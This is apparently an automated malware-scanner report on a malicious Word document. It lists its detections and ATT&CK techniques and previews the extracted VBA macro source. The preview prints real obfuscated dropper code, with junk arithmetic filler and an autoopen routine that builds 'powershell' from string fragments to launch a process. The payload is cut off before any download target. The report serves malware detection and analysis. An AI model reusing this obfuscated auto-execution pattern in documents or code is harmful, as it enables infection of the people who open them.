MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. Heuristics indicate the use of AutoOpen and GetObject to launch Win32_Process, suggesting an attempt to execute arbitrary code. The ClamAV detection further confirms its malicious nature. The VBA code is heavily obfuscated, but the presence of auto-execution markers and process creation calls strongly implies a downloader or dropper functionality.
Heuristics 8
-
ClamAV: Doc.Malware.Sagent-6889631-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6889631-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58841 bytes |
SHA-256: 4cc15da5afa47aac642d3a6d3fd13c78ea7de7da1edb01fa428451b3de3f6549 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "C_AQAZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function KB1CAxBD()
Set kAUBX_AB = JGABAUAk
If tZXXw4 = iAADAD Then
wA4oADx = Hex(435593486 - CDate(OZAAAG) * BwDZA4C4 * 889358871)
pBQUZQk = CDbl(YQ_AUAAc)
vGckDC_ = CStr(412085146 * 288942655)
C_ADcwQA = Round(GXAwZA - Hex(IACUAC))
End If
Set wAUUDDo = OUUkAA
If GD_QU4o1 = OcwBUQZG Then
A1UQA_A = Cos(833476017 - CDbl(p_UAXUD) * WBUAw4A * 11270406)
I4c4AABD = Hex(vXAQZDA)
ixAUkAA4 = Fix(387179353 * 501258138)
YcABAA = Int(kDAAAAwQ - Hex(HQBAQGA))
End If
Set zwU_Qok = WkA1AA
If KkBAAAB = QCAA_UU Then
TAACAACx = CDate(461176580 - Tan(iBUGDAA) * qABUAB * 178652828)
wU4AQQ = Chr(NBAUA4AA)
bUGAABQA = CDbl(214868548 * 597967239)
lBAA_AcB = ChrB(PkQ_AAGB - Log(IAAQ4AAQ))
End If
Set YBAAwQAc = MwAA1A
If nZAC_GCD = vAAGXAoB Then
XAAAADD = Atn(377095714 - ChrW(RUxAZ1w) * FDoUAD * 946891097)
BkAAU1Z = Hex(U4D4BAAQ)
IXABDA = CInt(657236021 * 76238042)
TXDAQDA = Sin(zAAA4BA - Log(pQcAQUA))
End If
Set VGABAw1 = w4wAAk
If vACBCXA = sCAAAAX Then
toDBDQAc = Fix(500421440 - Chr(jABAUA) * Z_ZxAx * 381413997)
KAAxADw = CDbl(TAUQCGAA)
FkD4Qk = CInt(774807129 * 526287819)
FQUwAQ_A = Tan(UAZACGG - Log(q1xAAw1))
End If
Set OCA4AAAB = aCcAoGA
If txDQwUU = a4UAkAD Then
i4UBAAA = Sgn(661201866 - Fix(Ux1A1UA) * IUowAUDc * 203026507)
cUBA4AX1 = Int(lBXk_Q)
GACAAkGQ = Sin(401646281 * 358878522)
EB_GAx = Sin(ICwBX4AA - CLng(dokkDA))
End If
Set jAA4AkoA = ECDXADB
If YA1UZA = hcACwX4D Then
CkAAUkGU = CStr(958014342 - Rnd(LABG4GAD) * cUwAAA * 459857187)
lBxAQAUA = CInt(BAD_wA)
P4QAxc = CBool(629658318 * 492720860)
vGcwBX = CInt(KxQDADAX - ChrW(YAxAXcA))
End If
End Function
Sub autoopen()
On Error Resume Next
Set mwcGcAx = RCA4AAwA
If YBCBDD = oAQ4XoAB Then
PBDZGB = Rnd(54506022 - CLng(uBUDAD) * uAAAAk * 338295885)
AAAABAA = Log(YUcADQB)
HDA4AUAB = Log(759282017 * 992358767)
YxAABAxQ = CBool(ODGoDAc - Round(BAAXAA))
End If
Set tZXQAGwQ = kQxUAAD
If iCQwQGAc = LACwAA Then
WUCGcA = Round(646401813 - CDbl(VcCAQX) * pDAABwU * 635741295)
BA1kAAD = Int(qccA4ZB)
jA_AAUDU = Cos(724087477 * 408180537)
MA_c41A = CDate(LCBUDQ - Round(jAAAUxAc))
End If
Set w1cBUAAU = fDoQAQ
If zQAkADo = bUABAZXA Then
uBAQAC1w = CBool(119407176 - Oct(fAD1AcA) * wGUQwAU * 452636348)
lQ4DU_U = ChrB(K_BQAkAA)
AQAC1A = Tan(199467653 * 161129995)
iwA_QG = Atn(zUADcx - CLng(EAUA1x))
End If
IQAACUX (FxZAUQc + "po" + mAXBBABQ + "wershel" + RUoAoBU + lABGAA + GoDBw4A_ + qGA1AA + EA1cAAwA + GBDDBBkA + vDAUkXB + S4CkQA_)
Set wUAAooA = FAAcAABc
If iQAwDBU = PoAoUBUA Then
UAADGAUX = Log(328917218 - CBool(DQA4XCA) * w_x_DA1 * 450893849)
wwQkAD = Log(EXUAD_A)
C1XoQBA = Round(923099826 * 943318027)
AAAAUA_ = CStr(WUZAZD - Sqr(PDQwBBAA))
End If
Set qZQU1k = TAZAAk
If zBBQAC = d4DxD_ Then
BABAAA = CLng(916399824 - Fix(sxow4UA) * PAQDDoZZ * 131820551)
vcAAAo = CInt(iDxA_A)
GACA_ADA = Rnd(777832598 * 549218008)
zBQQwD_o = Sqr(DUQDXAA - Round(LZCD_A))
End If
Set HAAGAAo = jAQ4UoD
If NAc4A4Z = uAADQ_A Then
vcD4AU = Oct(444684393 - ChrW(aAAAkAA) * TQQAAU * 538050094)
hAXABG = Int(ABG4BA)
zAAA1o = Oct(456389661 * 261817144)
aZ_BUAB = Int(VAXQD_co - Sqr(aAUAwAQ))
End If
End Sub
Function SAXUGAA()
Set zAwA_Q = GxkUAZCA
If D4BADA = X_UADD Then
zAoUAUDA = Int(770542664 - Sin(
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.